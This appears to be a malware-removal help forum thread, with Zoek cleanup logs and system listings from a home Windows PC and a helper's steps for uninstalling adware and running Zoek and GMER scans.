user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.cid", 58488);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.firstrun", false);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.hadappinstalled", true);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.installationdate", 1402335508);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.modetype", "production");
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.reportInstall", true);
user_pref("extensions.afaf73efed6aa46eb8014e0b47ac07eada90d6ab4be694e96a9791fd9c1ae6f92com58488.statsDailyCounter", 1);
---- Lines extensions.5GaH removed from prefs.js ----
user_pref("extensions.5GaH.epoch", "1402417155");
user_pref("extensions.5GaH.url", "http://guardsetstarr...a7rdUFqTw6qdUMD
---- Lines extensions.Zow removed from prefs.js ----
user_pref("extensions.Zow.epoch", "1402417155");
user_pref("extensions.Zow.url", "http://winnerspy.eu/...Ta4rjgFpdr6tNhV
---- FireFox user.js and prefs.js backups ----

prefs_062014_1921_.backup

ProfilePath: C:\Users\Sarah\AppData\Roaming\Mozilla\Firefox\Profiles\bsba1crn.default

user.js not found
---- Lines extensions.5GaH removed from prefs.js ----
user_pref("extensions.5GaH.epoch", "1402378997");
user_pref("extensions.5GaH.url", "http://webterminall....dUEqjnGrHUMDMlG
---- Lines extensions.Zow removed from prefs.js ----
user_pref("extensions.Zow.epoch", "1402378997");
user_pref("extensions.Zow.url", "http://toolkitcoupon...jnEqTa4rdk9rjkG
---- FireFox user.js and prefs.js backups ----

prefs_062014_1921_.backup

==== Registry Fix Code ======================

Windows Registry Editor Version 5.00

[HKEY_USERS\S-1-5-21-3242301468-3912853311-3031073808-1003\Software\Microsoft\Windows\CurrentVersion\Run]
"uTorrent"=-
"SearchProtection"=-
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Internet Helper Anti-phishing"=-
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"uTorrent"=-
"SearchProtection"=-
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=""

==== Registry Fix Code x64 ======================

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=""

==== Deleting Files \ Folders ======================

C:\PROGRA~2\SearchProtect not found
C:\Users\paulj_000\AppData\Roaming\Search Protection not found
C:\Program Files (x86)\MyPC Backup not found
c:\progra~3\perfor~1 not found
C:\Program Files\Reimage not found
C:\Users\PAULJ_~1\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default\extensions\staged not found
C:\Users\PAULJ_~1\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default\extensions\[email protected] not found
C:\Users\Sarah\AppData\Roaming\Mozilla\Firefox\Profiles\bsba1crn.default\extensions\staged not found
C:\Users\Sarah\AppData\Roaming\Mozilla\Firefox\Profiles\bsba1crn.default\extensions\[email protected] not found
C:\Users\paulj_000\AppData\Local\antiphishing-internethelper not found
C:\Users\paulj_000\AppData\Local\SearchProtect not found
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair not found
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SoftwareWatcher bundle not found
C:\Program Files (x86)\SearchProtect not found
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Optimizer Pro v3.2 not found
C:\Program Files (x86)\Optimizer Pro not found
C:\Program Files (x86)\sweetpacks bundle uninstaller not found
"C:\Users\Sarah\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPC Backup.lnk" not found
"C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk" not found
C:\ProgramData\Internet Helper Anti-phishing deleted
C:\ProgramData\toopbUyEr deleted
C:\ProgramData\b809a102f4c41187 deleted
C:\Program Files (x86)\SuperFastPC deleted
C:\Users\paulj_000\AppData\LocalLow\{2A77DC0F-47C5-4341-6EAA-586700BAD171} deleted
C:\Users\paulj_000\AppData\LocalLow\{DB458257-B25C-8DD6-DBA9-285ED6951694} deleted
C:\Users\paulj_000\AppData\Local\Packages\windows_ie_ac_001\AC\{2A77DC0F-47C5-4341-6EAA-586700BAD171} deleted
C:\Users\paulj_000\AppData\Local\Packages\windows_ie_ac_001\AC\{DB458257-B25C-8DD6-DBA9-285ED6951694} deleted
C:\PROGRA~2\toopbUyEr deleted
C:\Users\Sarah\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\SpeedUpMyPC.lnk deleted
C:\Windows\Reimage.ini deleted
C:\Users\PAULJ_~1\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default\extensions\[email protected]9c1ae6f92.com deleted

==== System Specs ======================

Windows: Windows Version 6.2 (Build 9200)
Memory (RAM): 3993 MB
CPU Info: Intel® Celeron® CPU  N2810  @ 2.00GHz
CPU Speed: 2007.9 MHz
Sound Card: Speaker/HP (Realtek High Defini |
Display Adapters: Intel® HD Graphics | Intel® HD Graphics
Monitors: 1x; Generic PnP Monitor |
Screen Resolution: 1366 X 768 - 32 bit
Network: Network Present
Network Adapters: Microsoft Wi-Fi Direct Virtual Adapter | Qualcomm Atheros QCA9565 802.11b/g/n WiFi Adapter | Realtek PCIe FE Family Controller
CD / DVD Drives: 1x (E: | ) E: hp      CDDVDW SU-208FB
Ports: COM Ports NOT Present. LPT Port NOT Present.
Mouse: 5 Button Wheel Mouse Present
Hard Disks: C:  914.8GB | D:  15.9GB
Hard Disks - Free: C:  849.8GB | D:  1.6GB
Manufacturer *: Hewlett-Packard
BIOS Info: AT/AT COMPATIBLE |  | HPQOEM - 3
Time Zone: GMT Standard Time
Motherboard *: Hewlett-Packard 2190
Country: United Kingdom
Language: ENG

==== System Specs (Software) ======================

Anti-Virus: Windows Defender On-access scanning disabled (Outdated)
Anti-Virus: avast! Antivirus On-access scanning disabled (Outdated)
Anti-Spyware: Windows Defender disabled (Outdated)
Anti-Spyware: avast! Antivirus disabled (Outdated)
Internet Explorer Version: 11.0.9600.17107
Mozilla Firefox version: 29.0.1 (x86 en-GB)
Google Chrome version: 35.0.1916.114
Flash Player version: 13.0.0.214
Shockwave Player version: 12.0.4r144

==== Startup Registry Enabled ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YouCam Service"="C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe /s"
"HPMessageService"="C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe"
"AvastUI.exe"="C:\Program Files\AVAST Software\Avast\AvastUI.exe /nogui"

==== Startup Registry Enabled x64 ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="C:\Windows\system32\igfxtray.exe"
"HotKeysCmds"="C:\Windows\system32\hkcmd.exe"
"Persistence"="C:\Windows\system32\igfxpers.exe"
"RTHDVCPL"="C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s"
"SimplePass"="C:\Program Files\Hewlett-Packard\SimplePass\HPSmplPass.exe /hideui"
"OPBHOBroker"="C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe"
"OPBHOBrokerDesktop"="C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe"
"Classic Start Menu"="C:\Program Files\Classic Shell\ClassicStartMenu.exe -autorun"
"SynTPEnh"="%ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe "

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"NCPluginUpdater"="C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe Update"

==== Startup Folders ======================

2014-06-09 05:28:39    1195    ----a-w-    C:\Users\Sarah\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DesktopWeatherAlerts.lnk
2014-06-09 05:30:02    1163    ----a-w-    C:\Users\Sarah\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Weather Alerts.lnk

==== Task Scheduler Jobs ======================

C:\Windows\tasks\Adobe Flash Player Updater.job --a-------- C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [13/05/2014 21:23]
C:\Windows\tasks\GoogleUpdateTaskMachineCore.job --a-------- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [04/05/2014 16:56]
C:\Windows\tasks\GoogleUpdateTaskMachineUA.job --a-------- C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [04/05/2014 16:56]
C:\Windows\tasks\HPCeeScheduleForpaulj_000.job --a-------- C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [15/07/2011 04:43]
C:\Windows\tasks\HPCeeScheduleForSarah.job --a-------- C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [15/07/2011 04:43]

==== Other Scheduled Tasks ======================

"C:\Windows\SysNative\tasks\Adobe Flash Player Updater" [C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe]
"C:\Windows\SysNative\tasks\CLMLSvc_P2G8" [C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe]
"C:\Windows\SysNative\tasks\CLVDLauncher" [C:\Program Files (x86)\CyberLink\Power2Go8\CLVDLauncher.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineCore" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskMachineUA" [C:\Program Files (x86)\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\HPCeeScheduleForpaulj_000" [C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe]
"C:\Windows\SysNative\tasks\HPCeeScheduleForSarah" [C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe]
"C:\Windows\SysNative\tasks\Synaptics TouchPad Enhancements" ["C:\Program Files\Synaptics\SynTP\SynTPEnh.exe"]
"C:\Windows\SysNative\tasks\temp_ada83cfd-5ef3-4064-a75e-640321c9eafb-7" [C:\Program Files (x86)\Free_Ven_s_pro 25\Free_Ven_s_pro 25-nova.exe]
"C:\Windows\SysNative\tasks\temp_d71a77cf-58c7-4391-af6b-052d6a49ce04-7" [C:\Program Files (x86)\Mediaa_Play_AIR_1.4\Mediaa_Play_AIR_1.4-nova.exe]
"C:\Windows\SysNative\tasks\User_Feed_Synchronization-{02818842-BFB5-4559-BA7D-2FE689C8B86C}" [C:\Windows\system32\msfeedssync.exe]
"C:\Windows\SysNative\tasks\User_Feed_Synchronization-{F986E634-3E42-4B80-80BA-BBC8DF9E2D1E}" [C:\Windows\system32\msfeedssync.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start" [C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis" [C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\Update Check" [C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker" [C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe]
"C:\Windows\SysNative\tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan" [C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe]

==== Firefox Extensions Registry ======================

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]
"[email protected]"="C:\Program Files\AVAST Software\Avast\WebRep\FF" [04/05/2014 16:54]

==== Firefox Extensions ======================

ProfilePath: C:\Users\PAULJ_~1\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default
- Undetermined - C:\Users\paulj_000\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default\extensions\[email protected]9c1ae6f92.com

AppDir: C:\Program Files (x86)\Mozilla Firefox
- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

==== Firefox Plugins ======================

Profilepath: C:\Users\paulj_000\AppData\Roaming\Mozilla\Firefox\Profiles\f7t4qr94.default
A58DE0A570148AF5FF3512B2A340D09F    - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_13_0_0_214.dll -    Shockwave Flash
0C0C5C207121C7A78414A8250E8E099A    - C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll -    Shockwave for Director / Shockwave for Director


==== Chrome Look ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
gomekmidlodglbbmalcneegieacbdmki - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx[04/05/2014 16:53]

Google Drive - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
YouTube - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Google Search - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
Strong Password Generator - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\emehklffcaphknhhfhadkjhpfapcbpco
avast Online Security - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki
Mediaa_Play_AIR_1.4 - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfhkgfigejkhikbkfkkglinnkfojkdek
Google Wallet - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Gmail - paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia
Google Docs - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake
Google Drive - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf
YouTube - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Google Search - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
Strong Password Generator - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\emehklffcaphknhhfhadkjhpfapcbpco
Free_Ven_s_pro 25 - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\flcnmdehjfeflkohlockkbmoglehckdf
avast Online Security - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki
Google Wallet - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Gmail - Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia

==== Chrome Fix ======================

C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\effalkbfcccbfoockmapkhkmkijlfmbh deleted successfully
C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_effalkbfcccbfoockmapkhkmkijlfmbh_0.localstorage deleted successfully
C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_effalkbfcccbfoockmapkhkmkijlfmbh_0.localstorage-journal deleted successfully
C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\kpmobbbkiifncejmggdjbhcapfmacgeb deleted successfully
C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_kpmobbbkiifncejmggdjbhcapfmacgeb_0.localstorage deleted successfully
C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_kpmobbbkiifncejmggdjbhcapfmacgeb_0.localstorage-journal deleted successfully
C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\emehklffcaphknhhfhadkjhpfapcbpco deleted successfully
C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\emehklffcaphknhhfhadkjhpfapcbpco deleted successfully
C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_emehklffcaphknhhfhadkjhpfapcbpco_0.localstorage deleted successfully
C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_emehklffcaphknhhfhadkjhpfapcbpco_0.localstorage-journal deleted successfully
C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfhkgfigejkhikbkfkkglinnkfojkdek deleted successfully
C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Extensions\flcnmdehjfeflkohlockkbmoglehckdf deleted successfully
C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_flcnmdehjfeflkohlockkbmoglehckdf_0.localstorage deleted successfully
C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_flcnmdehjfeflkohlockkbmoglehckdf_0.localstorage-journal deleted successfully

==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://uk.search.yah...=spigot-yhp-ie"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL"="http://www.google.com"
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main]
"Default_Page_URL"="http://www.google.com"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="about:newtab"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="about:newtab"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
No DefaultScope Set For HKCU

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://www.google.com"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL"="http://go.microsoft..../?LinkId=69157"
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main]
"Default_Page_URL"="http://go.microsoft..../?LinkId=69157"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"="{6A1806CD-94D4-4689-BA73-E35EA1EA9990}"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing  Url="http://www.bing.com/...TR&pc=CPNTDFJS"
{6A1806CD-94D4-4689-BA73-E35EA1EA9990} Google  Url="http://www.google.co...ge={startPage}"

==== Empty IE Cache ======================

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 emptied successfully
C:\Users\paulj_000\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\paulj_000\AppData\Local\Microsoft\Windows\INetCache\Low\Content.IE5 emptied successfully
C:\Users\Sarah\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Users\Sarah\AppData\Local\Microsoft\Windows\INetCache\Low\Content.IE5 emptied successfully
C:\Windows\SysNative\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Windows\sysWoW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully
C:\Windows\sysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 emptied successfully

==== Empty FireFox Cache ======================

C:\Users\paulj_000\AppData\Local\Mozilla\Firefox\Profiles\f7t4qr94.default\Cache emptied successfully
C:\Users\Sarah\AppData\Local\Mozilla\Firefox\Profiles\bsba1crn.default\Cache emptied successfully

==== Empty Chrome Cache ======================

C:\Users\paulj_000\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully
C:\Users\Sarah\AppData\Local\Google\Chrome\User Data\Default\Cache emptied successfully

==== Empty All Flash Cache ======================

Flash Cache Emptied Successfully

==== Empty All Java Cache ======================

No Java Cache Found

==== C:\zoek_backup content ======================

C:\zoek_backup (files=309 folders=53 3634864 bytes)

==== Empty Temp Folders ======================

C:\Users\Default\AppData\Local\Temp emptied successfully
C:\Users\Default User\AppData\Local\Temp emptied successfully
C:\Users\paulj_000\AppData\Local\Temp will be emptied at reboot
C:\Users\Sarah\AppData\Local\Temp emptied successfully
C:\Windows\serviceprofiles\networkservice\AppData\Local\Temp emptied successfully
C:\Windows\serviceprofiles\Localservice\AppData\Local\Temp emptied successfully
C:\Windows\Temp will be emptied at reboot

==== After Reboot ======================

==== Empty Temp Folders ======================

C:\Windows\Temp successfully emptied
C:\Users\PAULJ_~1\AppData\Local\Temp successfully emptied

==== Empty Recycle Bin ======================

C:\$RECYCLE.BIN successfully emptied

==== EOF on 09/06/2014 at 19:28:37.73 ======================


 

 

 

 

 

 


  • 0

#6
Naathim

Naathim

    GeekU Minion

  • Expert
  • 4,568 posts
Hi :)
 
Some minor things to remove here, and looks like you got them very lately.
 

= = = = = = = = = = = = = = = = = = = =



icon_arrow.gifFIRST
We need to uninstall some software from your machine.

Please open Start > Control Panel > Uninstall a program or Programs and Features if in Classic View, locate these programs on the list and uninstall them one after another:
  • Free_Ven_s_pro 25    
  • Mediaa_Play_AIR_1.4    
All of these are unwanted, so don't hesitate to get rid of them!
If you won't find some of them in the Control Panel, just move on and notify me :)
 
 



= = = = = = = = = = = = = = = = = = = =



icon_arrow.gifSECOND
I need you to download the attached script:
Attached File  zoekscript.txt   758bytes   109 downloads

icon_idea.gif Disable your AntiVirus and AntiSpyware programs, so they do not interfere with the running of Zoek.exe. You can find instructions how to disable your security applications here.

Now, on your Desktop, drag and drop zoekscript.txt on Zoek.exe as shown below:



51dd31d8563a6-output_TD9fmK.gif


Please approve any UAC prompt to allow this action to proceed.

Answer Yes to the following prompt to allow the zoek script to run:



zoek-script-warning.jpg


This action causes Zoek.exe to start automatically. Please be patient while Zoek is scanning.

When the tool finishes, the zoek-results.log is opened in Notepad.
The log is also found on the systemdrive, normally C:\
If a reboot is needed, the log is opened after the reboot.

Please post the zoek-results.log in your reply.
 
 



= = = = = = = = = = = = = = = = = = = =



icon_arrow.gifTHIRD
GMER scanner for the lurking rootkits


Please download GMER and save it to your desktop.
  • it will come as a randomly named file (like a6ge38b4.exe) - that's absolutely normal.
  • Disconnect from the Internet and close all running programs
  • Temporarily disable any real-time active protection
  • It is very important you do not use your computer while GMER is running
  • Right-click on the randomly named GMER gmericon.png icon and choose Run as Administrator
  • GMER will open to the Rootkit/Malware tab and perform an automatic quick scan
If you receive a warning about rootkit activity and are asked to fully scan your system click NO!

icon_arrow.gif Please check in the Quick scan box
icon_arrow.gif Please uncheck the following:
  • IAT/EAT
  • Show All

GMER2new_zpsdd936679.jpg

  • Click Scan
  • If you see a rootkit warning window click OK
  • When the scan is finished, Save the results to your desktop as gmer.log
  • Click Copy then paste the results in your reply
  • Exit GMER and be sure to re-enable your Antivirus, Firewall and any other security programs you had disabled
icon_idea.gif
  • If you encounter any problems, try running GMER in Safe Mode
  • If GMER crashes or keeps resulting in a Blue Screen of Death, uncheck Devices on the right side before scanning

= = = = = = = = = = = = = = = = = = = =



Now in your next reply please include these ones for my review:
icon_arrow.gif ZOEK report
icon_arrow.gif GMER report
icon_arrow.gif an update about how is your machine performing after this set of instructions


I don't mind multiple posts if necessary.

Cheers,
Naat :)
  • 0

#7
Naathim

Naathim

    GeekU Minion

  • Expert
  • 4,568 posts

Hi :)

 

Are you still somewhere around?

 

Cheers,

Naat :)


  • 0

#8
peejaygee

peejaygee

    Member

  • Topic Starter
  • Member
  • PipPip
  • 39 posts

+987][

0+*
Zoek.exe v5.0.0.0 Updated 02-June-2014
Tool run by paulj_000 on 11/06/2014 at 17:39:55.26.
Microsoft Windows 8.1 6.3.9600  x64
Running in: Normal Mode Internet Access Detected
Launched: C:\Users\paulj_000\Downloads\zoek.exe
Script used: C:\Users\paulj_000\Downloads\zoekscript(1).txt

==== Older Logs ======================

C:\zoek-results2014-06-05-162111.log    19395 bytes
C:\zoek-results2014-06-09-182837.log    44129 bytes

==== System Restore Info ======================

11/06/2014 17:43:09 Zoek.exe System Restore Point Created Succesfully.

==== Deleting CLSID Registry Keys ======================


==== Deleting CLSID Registry Values ======================


==== Installed Programs ======================

æTorrent  
7-Zip 9.20 (x64 edition)  
Adobe Flash Player 13 Plugin  
Adobe Shockwave Player 12.0  
Aloha TriPeaks  
avast Free Antivirus  
Bejeweled 3  
Bonjour  
Build-a-lot  
Classic Shell  
Cradle of Rome 2  
Crazy Chicken Soccer  
CyberLink LabelPrint  
CyberLink Media Suite 10  
CyberLink Power2Go 8  
CyberLink PowerDVD 12  
CyberLink YouCam  
D3DX10  
DisableMSDefender  
Energy Star  
Farm Frenzy  
Google Chrome  
Google Toolbar for Internet Explorer  
Google Update Helper  
Governor of Poker 2 Premium Edition  
Hewlett-Packard ACLM.NET v1.2.2.3  
HP Connected Music (Meridian - installer)  
HP Customer Experience Enhancements  
HP Documentation  
HP Postscript Converter  
HP Recovery Manager  
HP Registration Service  
HP SimplePass  
HP Support Assistant  
HP System Event Utility  
HP Utility Center  
HP Wireless Button Driver  
Inst5675  
Inst5676  
Intel® Processor Graphics  
Intel® Trusted Execution Engine  
Intel® Trusted Execution Engine Driver  
Jewel Match 3  
Mahjongg Artifacts  
Microsoft Application Error Reporting  
Microsoft Office  
Microsoft Silverlight  
Microsoft SQL Server 2005 Compact Edition [ENU]  
Microsoft Visual C++ 2005 Redistributable  
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17  
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161  
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17  
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161  
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219  
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219  
Movie Maker  
Mozilla Firefox 29.0.1 (x86 en-GB)  
Mozilla Maintenance Service  
MSVCRT  
MSVCRT110  
MSVCRT110_amd64  
Photo Common  
Photo Gallery  
Plants vs. Zombies - Game of the Year  
Polar Bowler  
Qualcomm Atheros Bluetooth Suite (64)  
Qualcomm Atheros Driver Installation Program  
Ranch Rush 2 - Premium Edition  
Realtek Card Reader  
Realtek Ethernet Controller All-In-One Windows Driver  
Realtek High Definition Audio Driver  
swMSM  
Synaptics Pointing Device Driver  
Trinklit Supreme  
Update Installer for WildTangent Games App  
Vacation QuestT - Australia  
Virtual Families  
VLC media player 2.1.3  
Wedding Dash  
WildTangent Games  
WildTangent Games App (HP Games)  
Windows Live Communications Platform  
Windows Live Essentials  
Windows Live Installer  
Windows Live Photo Common  
Windows Live PIMT Platform  
Windows Live SOXE  
Windows Live SOXE Definitions  
Windows Live UX Platform  
Windows Live UX Platform Language Pack  
Zuma's Revenge  

==== Running Processes ======================

C:\Program Files\AVAST Software\Avast\AvastSvc.exe
C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSMonitorServicePDVD12.exe
C:\Program Files (x86)\CyberLink\PowerDVD12\Kernel\DMS\CLMSServerPDVD12.exe
C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
C:\Program Files\AVAST Software\Avast\avastui.exe
C:\Users\paulj_000\Downloads\zoek.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe

==== Services (whitelist) ======================
Powered by E Dev

R2 - [AERTFilters] - Andrea RT Filters Service - C:\Program Files\Realtek\Audio\HDA\AERTSr64.EXE
R2 - [AtherosSvc] - AtherosSvc - "C:\Program Files (x86)\Bluetooth Suite\adminservice.exe"
R2 - [Bonjour Service] - Bonjour Service - "C:\Program Files\Bonjour\mDNSResponder.exe"
R2 - [Cachedrv server] -  HP SimplePass Cachedrv Service - "C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe"
R2 - [HP Support Assistant Service] - HP Support Assistant Service - "C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe"
